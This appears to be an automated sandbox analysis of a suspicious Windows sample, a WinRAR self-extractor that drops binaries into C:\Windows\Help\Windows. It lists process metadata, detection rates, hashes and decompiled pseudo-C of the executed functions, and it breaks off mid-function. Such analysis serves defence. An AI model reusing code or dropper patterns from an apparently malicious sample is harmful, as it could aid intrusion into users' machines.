Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low

General

Start time:01:16:57
Start date:30/03/2021
Path:C:\Windows\Help\Windows\LibHelper.exe
Wow64 process (32bit):true
Commandline:'C:\Windows\Help\Windows\LibHelper.exe'
Imagebase:0x1070000
File size:173568 bytes
MD5 hash:813B19969C3B67C6BB1369433142021A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
  • Detection: 17%, ReversingLabs
Reputation:low

General

Start time:01:16:57
Start date:30/03/2021
Path:C:\Windows\Help\Windows\WINWORD.EXE
Wow64 process (32bit):true
Commandline:'C:\Windows\Help\Windows\WINWORD.EXE'
Imagebase:0x2ff10000
File size:1422168 bytes
MD5 hash:15E52F52ED2B8ED122FAE897119687C4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
  • Detection: 0%, Metadefender, Browse
  • Detection: 0%, ReversingLabs
Reputation:moderate

Disassembly

Code Analysis

Reset < >

    Executed Functions

    C-Code - Quality: 17%
    			E0084CC0E(void* __edx, void* __ebp, void* __eflags, void* __fp0, void* _a92, void* _a94, void* _a98, void* _a100, void* _a102, void* _a104, void* _a106, void* _a108, void* _a112, void* _a152, void* _a156, void* _a204) {
    				char _v208;
    				void* __ebx;
    				void* __edi;
    				void* _t41;
    				void* _t42;
    				long _t51;
    				void* _t54;
    				intOrPtr _t58;
    				struct HWND__* _t74;
    				void* _t75;
    				WCHAR* _t95;
    				struct HINSTANCE__* _t97;
    				intOrPtr _t99;
    				void* _t103;
    				void* _t105;
    				void* _t106;
    				void* _t107;
    				void* _t125;
    
    				_t125 = __fp0;
    				_t89 = __edx;
    				E0083FD60(__edx, 1);
    				E0084966B("C:\Users\hardz\Desktop", 0x800);
    				E00849B13( &_v208); // executed
    				E0084103F(0x877370);
    				_t74 = 0;
    				E0084E920(0x7104, 0x885d08, 0, 0x7104);
    				_t106 = _t105 + 0xc;
    				_t95 = GetCommandLineW();
    				_t110 = _t95;
    				if(_t95 != 0) {
    					_push(_t95);
    					E0084B3B1(0, _t110);
    					if( *0x879601 == 0) {
    						E0084C8E7(__eflags, _t95); // executed
    					} else {
    						_t103 = OpenFileMappingW(0xf001f, 0, L"winrarsfxmappingfile.tmp");
    						if(_t103 != 0) {
    							UnmapViewOfFile(_t75);
    							_t74 = 0;
    						}
    						CloseHandle(_t103);
    					}
    				}
    				GetModuleFileNameW(_t74, 0x88ce18, 0x800);
    				SetEnvironmentVariableW(L"sfxname", 0x88ce18);
    				GetLocalTime(_t106 + 0xc);
    				_push( *(_t106 + 0x1a) & 0x0000ffff);
    				_push( *(_t106 + 0x1c) & 0x0000ffff);
    				_push( *(_t106 + 0x1e) & 0x0000ffff);
    				_push( *(_t106 + 0x20) & 0x0000ffff);
    				_push( *(_t106 + 0x22) & 0x0000ffff);
    				_push( *(_t106 + 0x22) & 0x0000ffff);
    				E00833F53(_t106 + 0x9c, 0x32, L"%4d-%02d-%02d-%02d-%02d-%02d-%03d",  *(_t106 + 0x24) & 0x0000ffff);
    				_t107 = _t106 + 0x28;
    				SetEnvironmentVariableW(L"sfxstime", _t107 + 0x7c);
    				_t97 = GetModuleHandleW(_t74);
    				 *0x870064 = _t97;
    				 *0x870060 = _t97; // executed
    				_t41 = LoadIconW(_t97, 0x64); // executed
    				 *0x87b704 = _t41; // executed
    				_t42 = E0084A553(_t89, _t125); // executed
    				 *0x885d04 = _t42;
    				E0083CFF4(0x870078, _t89, 0x88ce18);
    				E0084846F(0);
    				E0084846F(0);
    				 *0x8775dc = _t107 + 0x5c;
    				 *0x8775e0 = _t107 + 0x30; // executed
    				DialogBoxParamW(_t97, L"STARTDLG", _t74, E0084A62C, _t74); // executed
    				 *0x8775e0 = _t74;
    				 *0x8775dc = _t74;
    				E00848521(_t107 + 0x24);
    				E00848521(_t107 + 0x50);
    				_t51 =  *0x88de28;
    				if(_t51 != 0) {
    					Sleep(_t51);
    				}
    				if( *0x8785f8 != 0) {
    					E00849D14(0x88ce18);
    				}
    				E0083E7CD(0x885c00);
    				if( *0x8775d8 > 0) {
    					L00852BAE( *0x8775d4);
    				}
    				DeleteObject( *0x87b704);
    				_t54 =  *0x885d04;
    				if(_t54 != 0) {
    					DeleteObject(_t54);
    				}
    				if( *0x8700e0 == 0 &&  *0x8775cc != 0) {
    					E00836F18(0x8700e0, 0xff);
    				}
    				_t55 =  *0x88de2c;
    				 *0x8775cc = 1;
    				if( *0x88de2c != 0) {
    					E0084C946(_t55);
    					CloseHandle( *0x88de2c);
    				}
    				_t99 =  *0x8700e0; // 0x0
    				if( *0x88de21 != 0) {
    					_t58 =  *0x86d5fc; // 0x3e8
    					if( *0x88de22 == 0) {
    						__eflags = _t58;
    						if(_t58 < 0) {
    							_t99 = _t99 - _t58;
    							__eflags = _t99;
    						}
    					} else {
    						_t99 =  *0x88de24;
    						if(_t58 > 0) {
    							_t99 = _t99 + _t58;
    						}
    					}
    				}
    				E00849B7B(_t107 + 0x1c); // executed
    				return _t99;
    			}





















    0x0084cc0e
    0x0084cc0e
    0x0084cc19
    0x0084cc28
    0x0084cc31
    0x0084cc3b
    0x0084cc45
    0x0084cc4e
    0x0084cc53
    0x0084cc5c
    0x0084cc5e
    0x0084cc60
    0x0084cc62
    0x0084cc63
    0x0084cc6e
    0x0084ccdb
    0x0084cc70
    0x0084cc83
    0x0084cc87
    0x0084ccc8
    0x0084ccce
    0x0084ccce
    0x0084ccd1
    0x0084ccd7
    0x0084cc6e
    0x0084ccec
    0x0084ccfe
    0x0084cd05
    0x0084cd10
    0x0084cd16
    0x0084cd1c
    0x0084cd22
    0x0084cd28
    0x0084cd2e
    0x0084cd44
    0x0084cd49
    0x0084cd56
    0x0084cd5f
    0x0084cd64
    0x0084cd6a
    0x0084cd70
    0x0084cd76
    0x0084cd7b
    0x0084cd86
    0x0084cd8b
    0x0084cd94
    0x0084cd9d
    0x0084cdad
    0x0084cdbc
    0x0084cdc1
    0x0084cdcb
    0x0084cdd1
    0x0084cdd7
    0x0084cde0
    0x0084cde5
    0x0084cdec
    0x0084cdef
    0x0084cdef
    0x0084cdfc
    0x0084cdfe
    0x0084cdfe
    0x0084ce08
    0x0084ce14
    0x0084ce1c
    0x0084ce21
    0x0084ce2e
    0x0084ce30
    0x0084ce37
    0x0084ce3a
    0x0084ce3a
    0x0084ce43
    0x0084ce58
    0x0084ce58
    0x0084ce5d
    0x0084ce62
    0x0084ce6b
    0x0084ce6e
    0x0084ce79
    0x0084ce79
    0x0084ce86
    0x0084ce8c
    0x0084ce95
    0x0084ce9a
    0x0084ceaa
    0x0084ceac
    0x0084ceae
    0x0084ceae
    0x0084ceae
    0x0084ce9c
    0x0084ce9c
    0x0084cea4
    0x0084cea6
    0x0084cea6
    0x0084cea4
    0x0084ce9a
    0x0084ceb4
    0x0084cec4

    APIs
      • Part of subcall function 0083FD60: GetModuleHandleW.KERNEL32 ref: 0083FD78
      • Part of subcall function 0083FD60: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0083FD90
      • Part of subcall function 0083FD60: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 0083FDB3
      • Part of subcall function 0084966B: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00849673
      • Part of subcall function 00849B13: OleInitialize.OLE32(00000000), ref: 00849B2C
      • Part of subcall function 00849B13: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00849B63
      • Part of subcall function 00849B13: SHGetMalloc.SHELL32(008775C0), ref: 00849B6D
      • Part of subcall function 0084103F: GetCPInfo.KERNEL32(00000000,?), ref: 00841050
      • Part of subcall function 0084103F: IsDBCSLeadByte.KERNEL32(00000000), ref: 00841064
    • GetCommandLineW.KERNEL32 ref: 0084CC56
    • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0084CC7D
    • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0084CC8E
    • UnmapViewOfFile.KERNEL32(00000000), ref: 0084CCC8
      • Part of subcall function 0084C8E7: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0084C8FD
      • Part of subcall function 0084C8E7: SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0084C939
    • CloseHandle.KERNEL32(00000000), ref: 0084CCD1
    • GetModuleFileNameW.KERNEL32(00000000,0088CE18,00000800), ref: 0084CCEC
    • SetEnvironmentVariableW.KERNEL32(sfxname,0088CE18), ref: 0084CCFE
    • GetLocalTime.KERNEL32(?), ref: 0084CD05
    • _swprintf.LIBCMT ref: 0084CD44
    • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0084CD56
    • GetModuleHandleW.KERNEL32(00000000), ref: 0084CD59
    • LoadIconW.USER32(00000000,00000064), ref: 0084CD70
    • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001A62C,00000000), ref: 0084CDC1
    • Sleep.KERNEL32(?), ref: 0084CDEF
    • DeleteObject.GDI32 ref: 0084CE2E
    • DeleteObject.GDI32(?), ref: 0084CE3A
    • CloseHandle.KERNEL32 ref: 0084CE79
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
    • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$0Z$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
    • API String ID: 788466649-4125274049
    • Opcode ID: 49bb301e72389fbde9d9efa76d803289a451626bf640dd29671d951360592abd
    • Instruction ID: e0fee3f5639d3a23a2842e76bea331d67fe812ea4a832800b61554b6c378c90f
    • Opcode Fuzzy Hash: 49bb301e72389fbde9d9efa76d803289a451626bf640dd29671d951360592abd
    • Instruction Fuzzy Hash: C861D871904708AFD320FBA9EC49F2B3BACFB55750F014025F949E62A1DBB8D944CB62
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 67%
    			E008496AD(WCHAR* _a4) {
    				WCHAR* _v4;
    				intOrPtr _v8;
    				intOrPtr* _v16;
    				char _v20;
    				void* __ecx;
    				struct HRSRC__* _t14;
    				WCHAR* _t16;
    				void* _t17;
    				void* _t18;
    				void* _t19;
    				intOrPtr* _t26;
    				char* _t30;
    				long _t32;
    				void* _t34;
    				intOrPtr* _t35;
    				void* _t40;
    				struct HRSRC__* _t42;
    				intOrPtr* _t44;
    
    				_t14 = FindResourceW( *0x870060, _a4, "PNG"); // executed
    				_t42 = _t14;
    				if(_t42 == 0) {
    					return _t14;
    				}
    				_t32 = SizeofResource( *0x870060, _t42);
    				if(_t32 == 0) {
    					L4:
    					_t16 = 0;
    					L16:
    					return _t16;
    				}
    				_t17 = LoadResource( *0x870060, _t42);
    				if(_t17 == 0) {
    					goto L4;
    				}
    				_t18 = LockResource(_t17);
    				_t43 = _t18;
    				if(_t18 != 0) {
    					_v4 = 0;
    					_t19 = GlobalAlloc(2, _t32); // executed
    					_t40 = _t19;
    					if(_t40 == 0) {
    						L15:
    						_t16 = _v4;
    						goto L16;
    					}
    					if(GlobalLock(_t40) == 0) {
    						L14:
    						GlobalFree(_t40);
    						goto L15;
    					}
    					E0084EA80(_t20, _t43, _t32);
    					_a4 = 0;
    					_push( &_a4);
    					_push(0);
    					_push(_t40);
    					if( *0x86dff8() == 0) {
    						_t26 = E00849642(_t24, _t34, _v8, 0); // executed
    						_t35 = _v16;
    						_t44 = _t26;
    						 *((intOrPtr*)( *_t35 + 8))(_t35);
    						if(_t44 != 0) {
    							 *((intOrPtr*)(_t44 + 8)) = 0;
    							if( *((intOrPtr*)(_t44 + 8)) == 0) {
    								_push(0xffffff);
    								_t30 =  &_v20;
    								_push(_t30);
    								_push( *((intOrPtr*)(_t44 + 4)));
    								L0084D86E(); // executed
    								if(_t30 != 0) {
    									 *((intOrPtr*)(_t44 + 8)) = _t30;
    								}
    							}
    							 *((intOrPtr*)( *_t44))(1);
    						}
    					}
    					GlobalUnlock(_t40);
    					goto L14;
    				}
    				goto L4;
    			}





















    0x008496be
    0x008496c4
    0x008496c8
    0x008497a5
    0x008497a5
    0x008496dc
    0x008496e0
    0x00849700
    0x00849700
    0x008497a2
    0x00000000
    0x008497a2
    0x008496e9
    0x008496f1
    0x00000000
    0x00000000
    0x008496f4
    0x008496fa
    0x008496fe
    0x0084970e
    0x00849712
    0x00849718
    0x0084971c
    0x0084979c
    0x0084979c
    0x00000000
    0x008497a1
    0x00849727
    0x00849795
    0x00849796
    0x00000000
    0x00849796
    0x0084972c
    0x00849734
    0x0084973c
    0x0084973d
    0x0084973e
    0x00849747
    0x0084974e
    0x00849753
    0x00849757
    0x0084975c
    0x00849761
    0x00849766
    0x0084976b
    0x0084976d
    0x00849772
    0x00849776
    0x00849777
    0x0084977a
    0x00849781
    0x00849783
    0x00849783
    0x00849781
    0x0084978c
    0x0084978c
    0x00849761
    0x0084978f
    0x00000000
    0x0084978f
    0x00000000

    APIs
    • FindResourceW.KERNELBASE(00000066,PNG,?,?,0084A5A5,00000066), ref: 008496BE
    • SizeofResource.KERNEL32(00000000,75085B70,?,?,0084A5A5,00000066), ref: 008496D6
    • LoadResource.KERNEL32(00000000,?,?,0084A5A5,00000066), ref: 008496E9
    • LockResource.KERNEL32(00000000,?,?,0084A5A5,00000066), ref: 008496F4
    • GlobalAlloc.KERNELBASE(00000002,00000000,00000000,?,?,?,0084A5A5,00000066), ref: 00849712
    • GlobalLock.KERNEL32 ref: 0084971F
    • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0084977A
    • GlobalUnlock.KERNEL32(00000000), ref: 0084978F
    • GlobalFree.KERNEL32 ref: 00849796
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: GlobalResource$Lock$AllocBitmapCreateFindFreeFromGdipLoadSizeofUnlock
    • String ID: PNG
    • API String ID: 4097654274-364855578
    • Opcode ID: 14b6618e86550e66f229909589355d45c6332be6042d0551810c597e9da52c57
    • Instruction ID: 2ccf323ccdbbb48b3eb838f090c972c40ce1602797078623c1f9cbfb20a8703d
    • Opcode Fuzzy Hash: 14b6618e86550e66f229909589355d45c6332be6042d0551810c597e9da52c57
    • Instruction Fuzzy Hash: D821917160570AAFC7319F21DC88A2B7FA9FF86794B060528F985C2260EB71DC40CBA1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 80%
    			E0083A383(void* __edx, intOrPtr _a4, intOrPtr _a8, char _a32, short _a592, void* _a4692, WCHAR* _a4696, intOrPtr _a4700) {
    				struct _WIN32_FIND_DATAW _v0;
    				char _v4;
    				intOrPtr _v8;
    				intOrPtr _v12;
    				intOrPtr _v16;
    				char _v20;
    				char _v24;
    				signed int _t43;
    				signed int _t49;
    				signed int _t63;
    				void* _t65;
    				long _t68;
    				char _t69;
    				void* _t73;
    				void* _t82;
    				intOrPtr _t84;
    				void* _t87;
    				signed int _t89;
    				void* _t90;
    
    				_t82 = __edx;
    				E0084D9C0();
    				_push(_t89);
    				_t87 = _a4692;
    				_t84 = _a4700;
    				_t90 = _t89 | 0xffffffff;
    				_push( &_v0);
    				if(_t87 != _t90) {
    					_t43 = FindNextFileW(_t87, ??);
    					__eflags = _t43;
    					if(_t43 == 0) {
    						_t87 = _t90;
    						_t63 = GetLastError();
    						__eflags = _t63 - 0x12;
    						_t11 = _t63 != 0x12;
    						__eflags = _t11;
    						 *((char*)(_t84 + 0x1044)) = _t63 & 0xffffff00 | _t11;
    					}
    					__eflags = _t87 - _t90;
    					if(_t87 != _t90) {
    						goto L13;
    					}
    				} else {
    					_t65 = FindFirstFileW(_a4696, ??); // executed
    					_t87 = _t65;
    					if(_t87 != _t90) {
    						L13:
    						E0083FAE7(_t84, _a4696, 0x800);
    						_push(0x800);
    						E0083BA56(__eflags, _t84,  &_a32);
    						_t49 = 0 + _a8;
    						__eflags = _t49;
    						 *(_t84 + 0x1000) = _t49;
    						asm("adc ecx, 0x0");
    						 *((intOrPtr*)(_t84 + 0x1008)) = _v24;
    						 *((intOrPtr*)(_t84 + 0x1028)) = _v20;
    						 *((intOrPtr*)(_t84 + 0x102c)) = _v16;
    						 *((intOrPtr*)(_t84 + 0x1030)) = _v12;
    						 *((intOrPtr*)(_t84 + 0x1034)) = _v8;
    						 *((intOrPtr*)(_t84 + 0x1038)) = _v4;
    						 *(_t84 + 0x103c) = _v0.dwFileAttributes;
    						 *((intOrPtr*)(_t84 + 0x1004)) = _a4;
    						E00840AA9(_t84 + 0x1010, _t82,  &_v4);
    						E00840AA9(_t84 + 0x1018, _t82,  &_v24);
    						E00840AA9(_t84 + 0x1020, _t82,  &_v20);
    					} else {
    						if(E0083B3C9(_a4696,  &_a592, 0x800) == 0) {
    							L4:
    							_t68 = GetLastError();
    							if(_t68 == 2 || _t68 == 3 || _t68 == 0x12) {
    								_t69 = 0;
    								__eflags = 0;
    							} else {
    								_t69 = 1;
    							}
    							 *((char*)(_t84 + 0x1044)) = _t69;
    						} else {
    							_t73 = FindFirstFileW( &_a592,  &_v0); // executed
    							_t87 = _t73;
    							if(_t87 != _t90) {
    								goto L13;
    							} else {
    								goto L4;
    							}
    						}
    					}
    				}
    				 *(_t84 + 0x1040) =  *(_t84 + 0x1040) & 0x00000000;
    				return _t87;
    			}






















    0x0083a383
    0x0083a388
    0x0083a38e
    0x0083a390
    0x0083a39c
    0x0083a3a3
    0x0083a3a6
    0x0083a3a9
    0x0083a41e
    0x0083a424
    0x0083a426
    0x0083a428
    0x0083a42a
    0x0083a430
    0x0083a433
    0x0083a433
    0x0083a436
    0x0083a436
    0x0083a43c
    0x0083a43e
    0x00000000
    0x00000000
    0x0083a3ab
    0x0083a3b8
    0x0083a3ba
    0x0083a3be
    0x0083a444
    0x0083a452
    0x0083a457
    0x0083a45e
    0x0083a469
    0x0083a469
    0x0083a46d
    0x0083a477
    0x0083a47a
    0x0083a484
    0x0083a48e
    0x0083a498
    0x0083a4a2
    0x0083a4ac
    0x0083a4b6
    0x0083a4c0
    0x0083a4cd
    0x0083a4dd
    0x0083a4ed
    0x0083a3c4
    0x0083a3df
    0x0083a3f6
    0x0083a3f6
    0x0083a3ff
    0x0083a410
    0x0083a410
    0x0083a40b
    0x0083a40d
    0x0083a40d
    0x0083a412
    0x0083a3e1
    0x0083a3ee
    0x0083a3f0
    0x0083a3f4
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0083a3f4
    0x0083a3df
    0x0083a3be
    0x0083a4f2
    0x0083a505

    APIs
    • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0083A27E,000000FF,?,?), ref: 0083A3B8
    • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0083A27E,000000FF,?,?), ref: 0083A3EE
    • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0083A27E,000000FF,?,?), ref: 0083A3F6
    • FindNextFileW.KERNEL32(?,?,?,?,?,?,0083A27E,000000FF,?,?), ref: 0083A41E
    • GetLastError.KERNEL32(?,?,?,?,0083A27E,000000FF,?,?), ref: 0083A42A
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: FileFind$ErrorFirstLast$Next
    • String ID:
    • API String ID: 869497890-0
    • Opcode ID: f54a9e26e1c44fb1996816450039fb994ad35f9575a670a7e3921d2d6aecfaf6
    • Instruction ID: cdb6eb7d840fde7a98fa2fde81f2ea1e85180c50ce32d1b1b8848ac8802df092
    • Opcode Fuzzy Hash: f54a9e26e1c44fb1996816450039fb994ad35f9575a670a7e3921d2d6aecfaf6
    • Instruction Fuzzy Hash: 09416271608745AFC328DF68C884ADAF7E8FF88350F004A2AF5E9D3241D774A9548B96
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00856B19(int _a4) {
    				void* _t14;
    				void* _t16;
    
    				if(E00859DC9(_t14, _t16) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
    					TerminateProcess(GetCurrentProcess(), _a4);
    				}
    				E00856B9E(_t14, _t16, _a4);
    				ExitProcess(_a4);
    			}





    0x00856b25
    0x00856b41
    0x00856b41
    0x00856b4a
    0x00856b53

    APIs
    • GetCurrentProcess.KERNEL32(?,?,00856AEF,?,0086A8C8,0000000C,00856C46,?,00000002,00000000), ref: 00856B3A
    • TerminateProcess.KERNEL32(00000000,?,00856AEF,?,0086A8C8,0000000C,00856C46,?,00000002,00000000), ref: 00856B41
    • ExitProcess.KERNEL32 ref: 00856B53
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: Process$CurrentExitTerminate
    • String ID:
    • API String ID: 1703294689-0
    • Opcode ID: 09a11738f8763f007c78f5cc2c65a186a5afb6f58d74bc4b029d45a6584928fd
    • Instruction ID: b9d8a57e3687c33be56fdb56e56b4a03f090eb534d82d75eb77e0e4ea2bd7f98
    • Opcode Fuzzy Hash: 09a11738f8763f007c78f5cc2c65a186a5afb6f58d74bc4b029d45a6584928fd
    • Instruction Fuzzy Hash: 3AE04635000A08EBCF016F28CD08E583B2AFF003A2F414060FD05CB121DB76EC66CA92
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 68%
    			E00838458(intOrPtr __ecx) {
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				signed int _t370;
    				signed int _t374;
    				signed int _t375;
    				signed int _t380;
    				signed int _t385;
    				void* _t387;
    				signed int _t388;
    				signed int _t392;
    				signed int _t393;
    				signed int _t398;
    				signed int _t403;
    				signed int _t404;
    				signed int _t408;
    				signed int _t418;
    				signed int _t419;
    				signed int _t422;
    				signed int _t423;
    				signed int _t432;
    				char _t434;
    				char _t436;
    				signed int _t437;
    				signed int _t438;
    				signed int _t460;
    				signed int _t469;
    				intOrPtr _t472;
    				char _t479;
    				signed int _t480;
    				void* _t491;
    				void* _t499;
    				void* _t501;
    				signed int _t511;
    				signed int _t515;
    				signed int _t516;
    				signed int _t517;
    				signed int _t520;
    				signed int _t523;
    				signed int _t531;
    				signed int _t541;
    				signed int _t543;
    				signed int _t545;
    				signed int _t547;
    				signed char _t548;
    				signed int _t551;
    				void* _t556;
    				signed int _t564;
    				intOrPtr* _t574;
    				signed int _t577;
    				signed int _t586;
    				intOrPtr _t589;
    				signed int _t592;
    				signed int _t601;
    				signed int _t608;
    				signed int _t610;
    				signed int _t611;
    				signed int _t613;
    				signed int _t631;
    				signed int _t632;
    				void* _t639;
    				void* _t640;
    				signed int _t656;
    				signed int _t667;
    				intOrPtr _t668;
    				void* _t670;
    				signed int _t671;
    				signed int _t672;
    				signed int _t673;
    				signed int _t674;
    				signed int _t675;
    				signed int _t681;
    				intOrPtr _t683;
    				signed int _t688;
    				intOrPtr _t690;
    				signed int _t692;
    				signed int _t696;
    				void* _t698;
    				signed int _t699;
    				signed int _t702;
    				signed int _t703;
    				void* _t706;
    				void* _t708;
    				void* _t710;
    
    				E0084D8C4(E00861376, __ecx);
    				E0084D9C0();
    				_t574 =  *((intOrPtr*)(_t706 + 8));
    				_t665 = 0;
    				_t683 = __ecx;
    				 *((intOrPtr*)(_t706 - 0x20)) = __ecx;
    				_t370 =  *( *((intOrPtr*)(__ecx + 8)) + 0x82f2) & 0x0000ffff;
    				 *(_t706 - 0x18) = _t370;
    				if( *(_t706 + 0xc) != 0) {
    					L6:
    					_t690 =  *((intOrPtr*)(_t574 + 0x21dc));
    					__eflags = _t690 - 2;
    					if(_t690 == 2) {
    						 *(_t683 + 0x10f5) = _t665;
    						__eflags =  *(_t574 + 0x32dc) - _t665;
    						if(__eflags > 0) {
    							L22:
    							__eflags =  *(_t574 + 0x32e4) - _t665;
    							if(__eflags > 0) {
    								L26:
    								_t577 =  *(_t683 + 8);
    								__eflags =  *((intOrPtr*)(_t577 + 0x615c)) - _t665;
    								if( *((intOrPtr*)(_t577 + 0x615c)) != _t665) {
    									L29:
    									 *(_t706 - 0x11) = _t665;
    									_t35 = _t706 - 0x51a8; // -18856
    									_t36 = _t706 - 0x11; // 0x7ef
    									_t374 = E00835D90(_t577, _t574 + 0x2280, _t36, 6, _t665, _t35, 0x800);
    									__eflags = _t374;
    									_t375 = _t374 & 0xffffff00 | _t374 != 0x00000000;
    									 *(_t706 - 0x10) = _t375;
    									__eflags = _t375;
    									if(_t375 != 0) {
    										__eflags =  *(_t706 - 0x11);
    										if( *(_t706 - 0x11) == 0) {
    											__eflags = 0;
    											 *((char*)(_t683 + 0xf1)) = 0;
    										}
    									}
    									E00832006(_t574);
    									_push(0x800);
    									_t43 = _t706 - 0x113c; // -2364
    									_push(_t574 + 0x22a8);
    									E0083B040();
    									__eflags =  *((char*)(_t574 + 0x3373));
    									 *(_t706 - 0x1c) = 1;
    									if( *((char*)(_t574 + 0x3373)) == 0) {
    										_t380 = E008320F0(_t574);
    										__eflags = _t380;
    										if(_t380 == 0) {
    											_t548 =  *(_t683 + 8);
    											__eflags = 1 -  *((intOrPtr*)(_t548 + 0x72bc));
    											asm("sbb al, al");
    											_t61 = _t706 - 0x10;
    											 *_t61 =  *(_t706 - 0x10) &  !_t548;
    											__eflags =  *_t61;
    										}
    									} else {
    										_t551 =  *( *(_t683 + 8) + 0x72bc);
    										__eflags = _t551 - 1;
    										if(_t551 != 1) {
    											__eflags =  *(_t706 - 0x11);
    											if( *(_t706 - 0x11) == 0) {
    												__eflags = _t551;
    												 *(_t706 - 0x10) =  *(_t706 - 0x10) & (_t551 & 0xffffff00 | _t551 == 0x00000000) - 0x00000001;
    												_push(0);
    												_t54 = _t706 - 0x113c; // -2364
    												_t556 = E0083B98F(_t54);
    												_t656 =  *(_t683 + 8);
    												__eflags =  *((intOrPtr*)(_t656 + 0x72bc)) - 1 - _t556;
    												if( *((intOrPtr*)(_t656 + 0x72bc)) - 1 != _t556) {
    													 *(_t706 - 0x10) = 0;
    												} else {
    													_t57 = _t706 - 0x113c; // -2364
    													_push(1);
    													E0083B98F(_t57);
    												}
    											}
    										}
    									}
    									 *((char*)(_t683 + 0x5f)) =  *((intOrPtr*)(_t574 + 0x3319));
    									 *((char*)(_t683 + 0x60)) = 0;
    									asm("sbb eax, [ebx+0x32dc]");
    									 *((intOrPtr*)( *_t574 + 0x10))( *((intOrPtr*)(_t574 + 0x6ca8)) -  *(_t574 + 0x32d8),  *((intOrPtr*)(_t574 + 0x6cac)), 0);
    									_t667 = 0;
    									_t385 = 0;
    									 *(_t706 + 0xb) = 0;
    									 *(_t706 + 0xc) = 0;
    									__eflags =  *(_t706 - 0x10);
    									if( *(_t706 - 0x10) != 0) {
    										L43:
    										_t692 =  *(_t706 - 0x18);
    										_t586 =  *((intOrPtr*)( *(_t683 + 8) + 0x61f9));
    										_t387 = 0x49;
    										__eflags = _t586;
    										if(_t586 == 0) {
    											L45:
    											_t388 = _t667;
    											L46:
    											__eflags = _t586;
    											_t82 = _t706 - 0x113c; // -2364
    											_t392 = E00841001(_t586, _t82, (_t388 & 0xffffff00 | _t586 == 0x00000000) & 0x000000ff, _t388,  *(_t706 + 0xc)); // executed
    											__eflags = _t392;
    											if(__eflags == 0) {
    												L219:
    												_t393 = 0;
    												L16:
    												L17:
